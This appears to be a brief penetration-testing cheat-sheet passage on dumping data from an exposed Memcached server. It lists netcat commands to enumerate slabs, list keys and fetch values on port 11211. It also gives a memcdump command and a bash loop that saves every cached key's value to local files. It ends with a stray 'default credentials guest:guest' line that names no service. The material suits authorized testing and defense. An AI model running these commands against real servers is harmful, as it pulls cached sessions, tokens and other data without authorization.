echo "stats slabs" | nc -vn -w 1 <IP> 11211 #Get slabs
echo "stats items" | nc -vn -w 1 <IP> 11211 #Get items of slabs with info
echo "stats cachedump <number> 0" | nc -vn -w 1 <IP> 11211 #Get key names (the 0 is for unlimited output size)
echo "get <item_name>" | nc -vn -w 1 <IP> 11211 #Get saved info
➤ Install and use memcdump
memcdump --verbose --debug --servers=10.0.0.1 | tee keys.lst
➤ Execute the script
#!/bin/bash
file="keys.lst"   # file which contains the keys, one per line
while read -r line
do
    # fetch each key and store its value in <key>.txt
    echo "get $line" | nc -vn -w 1 10.0.0.1 11211 > "$line.txt"
done < "$file"
The default credentials are guest:guest
